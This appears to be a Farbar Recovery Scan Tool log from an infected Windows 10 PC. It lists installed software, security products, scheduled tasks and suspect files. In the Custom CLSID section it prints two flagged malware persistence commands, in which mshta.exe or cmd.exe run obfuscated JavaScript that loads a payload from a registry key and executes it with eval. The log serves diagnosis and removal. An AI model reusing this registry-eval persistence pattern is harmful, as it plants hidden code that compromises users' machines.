2014-07-09 18:03 - 2016-01-21 15:23 - 021401112 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2014-07-11 08:11 - 2014-07-11 10:57 - 000037663 _____ () C:\Users\Charlie\AppData\Roaming\Microsoft Excel 97-2003.ADR
2015-08-20 15:16 - 2015-05-08 15:41 - 000010240 _____ () C:\Users\Charlie\AppData\Local\Z@!-d255baf1-abe1-4f84-8b12-14150417ad4a.tmp
2015-08-20 15:16 - 2015-05-08 15:41 - 000009216 _____ () C:\Users\Charlie\AppData\Local\Z@S!-4d226dde-e80a-4cd1-b594-571eae57a1cf.tmp
2017-09-02 02:41 - 2017-09-02 02:41 - 000000000 ____H () C:\ProgramData\DP45977C.lfl
2014-07-15 11:54 - 2016-11-21 15:21 - 000000934 _____ () C:\ProgramData\Microsoft.SqlServer.Compact.400.32.bc
2017-09-27 06:24 - 2017-10-01 08:12 - 000000274 _____ () C:\ProgramData\ResPntListUNI.txt
2017-09-23 12:16 - 2017-09-23 12:16 - 001593561 ____N (                                                            ) C:\ProgramData\TR.exe

Files to move or delete:
====================
C:\ProgramData\TR.exe
C:\Users\Charlie\hpbcfgre.dll
C:\Users\Charlie\hpbuio32.dll
C:\Users\Charlie\hpbuio64.dll
C:\Users\Charlie\hpbuiodm64.dll
C:\Users\Charlie\hpmco175.dll
C:\Users\Charlie\hpmews02.dll
C:\Users\Charlie\hpmldm02.dll
C:\Users\Charlie\hpmprein.dll
C:\Users\Charlie\Install.dll
C:\Users\Charlie\Install.exe
C:\Users\Charlie\MRNOFXLOG.DAT
C:\Users\Charlie\mrn_SyncLog.dat


Some files in TEMP:
====================
2017-10-25 16:33 - 2017-10-25 16:33 - 001856576 _____ (Oracle Corporation) C:\Users\Charlie\AppData\Local\Temp\jre-8u151-windows-au.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2017-11-01 09:05

==================== End of FRST.txt ============================

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 02-11-2017
Ran by Charlie (10-11-2017 16:16:21)
Running from C:\Users\Charlie\Desktop
Windows 10 Pro Version 1703 15063.674 (X64) (2017-09-02 08:16:44)
Boot Mode: Safe Mode (with Networking)
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1808445638-3246226358-2469192111-500 - Administrator - Disabled)
Charlie (S-1-5-21-1808445638-3246226358-2469192111-1000 - Administrator - Enabled) => C:\Users\Charlie
DefaultAccount (S-1-5-21-1808445638-3246226358-2469192111-503 - Limited - Disabled)
Guest (S-1-5-21-1808445638-3246226358-2469192111-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1808445638-3246226358-2469192111-1002 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AV: AVG Antivirus (Disabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: AVG Antivirus (Disabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE}
FW: AVG Antivirus (Disabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (HKLM\...\{30689060-43BD-46E9-8A54-E6CDB18AAB88}) (Version: 20.2.1 - HP Inc.) Hidden
7-Zip 16.04 (x64) (HKLM\...\7-Zip) (Version: 16.04 - Igor Pavlov)
Active@ KillDisk 10 (HKLM\...\{6A633DB7-06E4-4EF1-8FD1-7F8812C590AD}_is1) (Version: 10 - LSoft Technologies Inc)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated)
Adobe Flash Player 27 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 27.0.0.183 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.20)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.20 - Adobe Systems Incorporated)
ANT Drivers Installer x64 (HKLM\...\{7664AF65-7B0D-4171-9F0F-50455278B428}) (Version: 2.3.4 - Garmin Ltd or its subsidiaries) Hidden
AVG (HKLM\...\{E61E6143-4937-43FC-8C12-06B8A987484D}) (Version: 1.211.3 - AVG Technologies) Hidden
AVG Internet Security (HKLM-x32\...\AVG Antivirus) (Version: 17.7.3032 - AVG Technologies)
AVG PC TuneUp (HKLM-x32\...\{A3DEEC4D-7D8A-465E-90BD-B853A19DDF82}) (Version: 16.75.1 - AVG Technologies) Hidden
AVG PC TuneUp (HKLM-x32\...\AVG PC TuneUp) (Version: 16.75.3.10304 - AVG Technologies)
AVS Document Converter 2.3.1 (HKLM-x32\...\AVS Document Converter_is1) (Version: 2.3.1.232 - Online Media Technologies Ltd.)
AVS Photo Editor 2.2.1.140 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.2.1.140 - Online Media Technologies Ltd.)
Canon CanoScan LiDE 220 On-screen Manual (HKLM-x32\...\Canon CanoScan LiDE 220 On-screen Manual) (Version: 7.7.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.11.1 - Canon Inc.)
Canon LiDE 220 User Registration (HKLM-x32\...\Canon LiDE 220 User Registration) (Version:  - ‭Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 3.0.0 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 3.0.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.4.0 - Canon Inc.)
CanoScan LiDE 220 Scanner Driver (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_CNQ4811) (Version: 1.00 - Canon Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.25 - Piriform)
Cisco Connect (HKLM-x32\...\Cisco Connect) (Version: 1.4.12068.0 - Cisco Consumer Products LLC)
Cisco WebEx Meetings (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\ActiveTouchMeetingClient) (Version:  - Cisco WebEx LLC)
Citrix Online Launcher (HKLM-x32\...\{DB014C85-A264-4BCA-A66F-6DD1FCF8EC36}) (Version: 1.0.335 - Citrix)
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.9.2.8 - Dell Inc.)
Dell Customer Connect (HKLM-x32\...\{04A41EBC-AB30-4574-A14D-E0CDFE31AB70}) (Version: 1.5.1.0 - Dell Inc.)
Dell Data Vault (HKLM\...\{2E55EEFD-2162-4A7D-9158-EDB0305603A6}) (Version: 4.3.7.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F173834}) (Version: 3.4.16100.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{3ED468C2-2235-4747-90AD-A7A34F0FE70A}) (Version: 1.2.2.8 - Dell)
Dell System Detect (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\58d94f3ce2c27db0) (Version: 7.11.0.6 - Dell)
Dell Update - SupportAssist Update Plugin (HKLM\...\{2228BC43-73DA-4F9A-BEE6-8E9C15328513}) (Version: 3.1.1.3832 - Dell Inc.)
Dell Update (HKLM-x32\...\{F91263FA-BE4D-439D-9C0A-2E7204E0E9E3}) (Version: 1.9.20.0 - Dell Inc.)
Dell WLAN and Bluetooth Client Installation (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Dell Inc.)
Dropbox 20 GB (HKLM-x32\...\{597A58EC-42D6-4940-8739-FB94491B013C}) (Version: 1.0.8.0 - Dropbox, Inc.)
Duplicate Photo Cleaner (HKLM\...\Duplicate Photo Cleaner_is1) (Version:  - WebMinds, Inc.)
EaseUS Partition Master 12.5 Trial Edition (HKLM-x32\...\EaseUS Partition Master Trial Edition_is1) (Version:  - EaseUS)
EasyDuplicateFinder v4.7 (HKLM\...\Easy Duplicate Finder 4_is1) (Version:  - WebMinds, Inc.)
Elevated Installer (HKLM-x32\...\{1052502B-4C91-43F9-B160-AE39ED57C9F0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden
FMW 1 (HKLM\...\{36133E9F-B129-4206-9FB4-13F707787542}) (Version: 1.226.3 - AVG Technologies) Hidden
Garmin Express (HKLM-x32\...\{BCC7CA85-E57F-452D-BB44-15A1CE018BD0}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden
Garmin Express (HKLM-x32\...\{bd8bd200-9a60-4969-b267-6b565f36e3da}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries)
Garmin Express Tray (HKLM-x32\...\{DA9C865D-6762-4931-8588-0B13B7A0796B}) (Version: 5.3.1.0 - Garmin Ltd or its subsidiaries) Hidden
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 61.0.3163.100 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.5 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
HydraVision (HKLM-x32\...\{65589581-920C-CAE1-58C2-2149D3AA3F39}) (Version: 4.2.180.0 - ATI Technologies Inc.) Hidden
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.7.3.1001 - Intel Corporation)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
iSEEK AnswerWorks English Runtime (HKLM-x32\...\{18A8E78B-9EF2-496E-B310-BCD8E4C1DAB3}) (Version: 010.000.0101 - Vantage Linguistics)
Java 8 Update 151 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180151F0}) (Version: 8.0.1510.12 - Oracle Corporation)
Laplink PCmover Professional (HKLM-x32\...\{99ADB194-BAD6-4787-AC22-A8E4A8346166}) (Version: 10.00.639 - Laplink Software, Inc.)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version:  - LastPass)
Logitech SetPoint 6.67 (HKLM\...\sp6) (Version: 6.67.83 - Logitech)
Malwarebytes version 3.2.2.2018 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.2.2.2018 - Malwarebytes)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\...\OneDriveSetup.exe) (Version: 17.3.7076.1026 - Microsoft Corporation)
Microsoft OneNote Home and Student 2016 - en-us (HKLM\...\OneNoteFreeRetail - en-us) (Version: 16.0.8625.2121 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.41212.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.51106 (HKLM-x32\...\{6e8f74e0-43bd-4dce-8477-6ff6828acc07}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.51106 (HKLM-x32\...\{8e70e4e1-06d7-470b-9f74-a51bef21088e}) (Version: 11.0.51106.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Mozilla Firefox 56.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 56.0 (x86 en-US)) (Version: 56.0 - Mozilla)
Mozilla Firefox 56.0.2 (x64 en-US) (HKLM\...\Mozilla Firefox 56.0.2 (x64 en-US)) (Version: 56.0.2 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 56.0.1 - Mozilla)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.8625.2121 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.8326.2107 - Microsoft Corporation) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.1.330 - Qualcomm Atheros Communications)
Quicken 2015 (HKLM-x32\...\{00C2D443-43D9-4550-ABEA-318288E23E57}) (Version: 24.1.15.10 - Intuit)
Quicken WillMaker Plus 2014 (HKLM-x32\...\{44160FDE-C190-45C1-B8E1-23F00228E572}) (Version: 1.0.0.0 - Nolo)
Rapport (HKLM-x32\...\{1DD81E7D-0D28-4CEB-87B2-C041A4FCB215}) (Version: 3.5.1804.161 - Trusteer) Hidden
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 10.0.10125.31214 - Realtek Semiconductor Corp.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7544 - Realtek Semiconductor Corp.)
Seagate Dashboard (HKLM-x32\...\{EA266F00-A8E7-43A0-8DED-FBFE3F076934}) (Version: 4.2.002.0 - Seagate)
TechPowerUp GPU-Z (HKLM-x32\...\TechPowerUp GPU-Z) (Version:  - TechPowerUp)
Trusteer Endpoint Protection (HKLM-x32\...\Rapport_msi) (Version: 3.5.1804.161 - Trusteer)
TurboTax 2014 (HKLM-x32\...\TurboTax 2014) (Version: 2014.0 - Intuit, Inc)
TurboTax 2015 (HKLM-x32\...\TurboTax 2015) (Version: 2015.0 - Intuit, Inc)
TurboTax 2016 (HKLM-x32\...\TurboTax 2016) (Version: 2016.0 - Intuit, Inc)
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 4.0.4 - Tweaking.com)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation)
Windows 10 Update Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
Windows Driver Package - Dynastream Innovations, Inc. ANT LibUSB Drivers (04/11/2012 1.2.40.201) (HKLM\...\F9D2A789F9CFF8CEC36B544F53877C80F1F73C46) (Version: 04/11/2012 1.2.40.201 - Dynastream Innovations, Inc.)
Windows Driver Package - Silicon Labs Software (DSI_SiUSBXp_3_1) USB  (02/06/2007 3.1) (HKLM\...\D1506E0025B5A3F9EB8270FE81C1EEDD9388B8A2) (Version: 02/06/2007 3.1 - Silicon Labs Software)
ZBot Trojan Remover v1.9.2 (HKLM-x32\...\ZBot Trojan Remover_is1) (Version: 1.9.2.0 - NoVirusThanks Company Srl)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\pdal: "C:\WINDOWS\system32\mshta.exe" "javascript:cCqk8iR0U="9Bm";O53U=new ActiveXObject("WScript.Shell");b5veD1="eq5oh";OoFP7=O53U.RegRead("HKCU\\software\\cllbfyv\\pwgf");pjGqK8X0X="b3xw0t";eval(OoFP7);kwg4nSeU="hwSXwy";" <==== ATTENTION
HKU\S-1-5-21-1808445638-3246226358-2469192111-1000\Software\Classes\yweguk: cmd.exe /c start "" "C:\Users\Charlie\AppData\Local\Aqiqliqoc\nzaqa.cvex" "javascript:xID4y="x";Tm8=new ActiveXObject("WScript.Shell");uSzMj5PF="dmUa4d40";aD67tp=Tm8.RegRead("HKCU\\software\\cllbfyv\\pwgf");nChf99B="iG";eval(aD67tp);Nrf3hI="6pH7iL3w";" <==== ATTENTION
ShellIconOverlayIdentifiers: [00avg] -> {472083B0-C522-11CF-8763-00608CC02F24} =>  -> No File
ContextMenuHandlers1: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers1: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers1: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2013-05-27] (Online Media Technologies Ltd.)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes)
ContextMenuHandlers4: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers4: [AVG Disk Space Explorer Shell Extension] -> {4838CD50-7E5D-4811-9B17-C47A85539F28} => C:\Program Files (x86)\AVG\AVG PC TuneUp\DseShExt-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers4: [AVG Shredder Shell Extension] -> {4858E7D9-8E12-45a3-B6A3-1CD128C9D403} => C:\Program Files (x86)\AVG\AVG PC TuneUp\SDShelEx-x64.dll [2017-07-26] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} =>  -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\WINDOWS\system32\igfxDTCM.dll [2017-03-13] (Intel Corporation)
ContextMenuHandlers6: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files\7-Zip\7-zip.dll [2016-10-04] (Igor Pavlov)
ContextMenuHandlers6: [AVG] -> {472083B1-C522-11CF-8763-00608CC02F24} => C:\Program Files (x86)\AVG\Antivirus\ashShA64.dll [2017-10-20] (AVG Technologies CZ, s.r.o.)
ContextMenuHandlers6: [BriefcaseMenu] -> {85BBD920-42A0-1069-A2E4-08002B30309D} =>  -> No File
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2017-08-21] (Malwarebytes)

==================== Scheduled Tasks (Whitelisted) =============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {03A2E7C8-1339-428F-9323-E99F1976CEB9} - \McAfee\McAfee Idle Detection Task -> No File <==== ATTENTION
Task: {09257EF5-F419-4D7F-BCD8-D2E362191430} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> No File <==== ATTENTION
Task: {0E9B0B5C-9FF3-4A29-8479-0868A68DD87B} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {191F9E6F-750B-463B-8275-674A085E6A42} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerRegistration => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] ()
Task: {21D98608-212B-477C-9E51-862F8F865EFA} - System32\Tasks\McAfeeLogon => C:\PROGRA~1\COMMON~1\McAfee\Platform\McUICnt.exe
Task: {22791815-78FB-4088-8BBB-3DA7D50664F8} - System32\Tasks\Antivirus Emergency Update => C:\Program Files (x86)\AVG\Antivirus\AvEmUpdate.exe [2017-10-20] (AVG Technologies CZ, s.r.o.)
Task: {2956E29D-A64D-413D-B892-F5AA2AC347BB} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {2A74738F-77EA-45BE-807D-0DA7AE3821FF} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-12-06] (Piriform Ltd)
Task: {30E15181-DAE3-4C0F-B9B0-DFDF919EF936} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> No File <==== ATTENTION
Task: {377D44F2-DA65-41BB-88CF-6FFF1FAB3C41} - System32\Tasks\Java Platform SE Auto Updater => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [2017-09-05] (Oracle Corporation)
Task: {3999671B-80BF-4CDF-A95C-93FD2F0FE480} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {3B2D8390-8289-4929-BA17-F6A1C85B47FB} - System32\Tasks\CreateExplorerShellUnelevatedTask => C:\WINDOWS\explorer.exe /NOUACCHECK
Task: {3CBC40D7-5079-4162-B3CF-8BB086B1F88F} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {3DA21760-C086-4BA7-960C-2C1B98E2C622} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> No File <==== ATTENTION
Task: {3E03F475-3149-4094-9896-BA78F8B2E6BC} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {40897B9F-93AB-425D-93AC-B8BA97E5EF17} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {42B3B434-E3AE-470E-99AF-7D12327B8919} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {43C39166-DBC4-4D93-BE8B-15FFD6AB03C8} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\WINDOWS\ehome\ehrec.exe
Task: {46EB3B5F-0B59-4CAC-A06A-88742BCC1E3C} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [2017-10-31] (Microsoft Corporation)
Task: {49072A42-1C33-4821-800D-28DD295D6786} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {4D2B3324-B32F-4DB4-B0C1-1503C3219780} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [2017-03-28] ()
Task: {4FF356D2-FE47-4920-B00B-3E8B260DCA26} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {528B6446-B6F7-44E3-AA71-6203798B4E57} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\WINDOWS\ehome\MCUpdate.exe
Task: {53C82D5D-CAA2-4928-AD01-FD5CA9402E42} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {54C24529-FE0D-45F3-921C-72B199731A29} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {56271ECE-25BE-42E2-A083-08593745AC10} - \SystemToolsDailyTest -> No File <==== ATTENTION
Task: {595084B0-8061-4646-9643-A34F03C12F44} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-28] (Google Inc.)
Task: {5ED329CA-9882-499A-8042-59D048F4FC4A} - System32\Tasks\UninstallDDS-C960901F-CE14-4DE1-9729-1305F719A337 => C:\WINDOWS\TEMP\DeleteFolderTask.exe <==== ATTENTION
Task: {602B3DF8-98F4-4CD6-81E9-42D5939CCFE7} - \PCDEventLauncherTask -> No File <==== ATTENTION
Task: {6064BBC8-744E-477D-B083-93B9E6B7C7D7} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> No File <==== ATTENTION
Task: {63882D74-4B0D-4654-86EE-D96AE3948093} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\WINDOWS\ehome\ehPrivJob.exe
Task: {6563DB5C-54FD-4007-98A3-1F779956369C} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\WINDOWS\ehome\mcupdate.exe
Task: {6A73D90C-B17C-4761-8357-1A346F1A3327} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\WINDOWS\ehome\mcupdate.exe
Task: {6E4E297E-904A-4E8C-A1D8-E7015D9472FF} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [2017-11-10] (Microsoft Corporation)
Task: {6FE732AA-0ED1-40DA-92A4-F64A10E68D10} - System32\Tasks\Microsoft\Office\OfficeBackgroundTaskHandlerLogon => C:\Program Files (x86)\Microsoft Office\root\Office16\officebackgroundtaskhandler.exe [2017-09-29] ()
Task: {74B79B52-5FD9-4C14-BAB0-205B4C4DD9F9} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\WINDOWS\ehome\ehPrivJob.exe
